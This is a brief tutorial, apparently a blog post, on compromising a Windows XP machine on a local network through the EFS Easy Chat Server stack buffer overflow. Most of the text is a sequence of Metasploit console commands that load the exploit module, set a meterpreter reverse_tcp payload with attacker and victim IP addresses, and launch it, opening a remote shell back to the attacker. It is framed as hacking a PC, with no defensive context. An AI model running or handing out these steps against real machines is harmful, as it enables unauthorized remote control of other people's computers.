Hack PC in LAN using EFS Easy Chat Server Buffer Overflow Attack

This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to “C:Program FilesEasy Chat Server”, is concatentated with “users” and the string passed as the username HTTP parameter.

Exploit Targets

Easy Chat Server 2.5

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/http/efs_easychatserver_username

Msf exploit (efs_easychatserver_username)>set payload windows/meterpreter/reverse_tcp

Msf exploit (efs_easychatserver_username)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (efs_easychatserver_username)>set rhost 192.168.1.8 (IP of Victim PC)

Msf exploit (efs_easychatserver_username)>exploit

Leave a Reply

Your email address will not be published. Required fields are marked *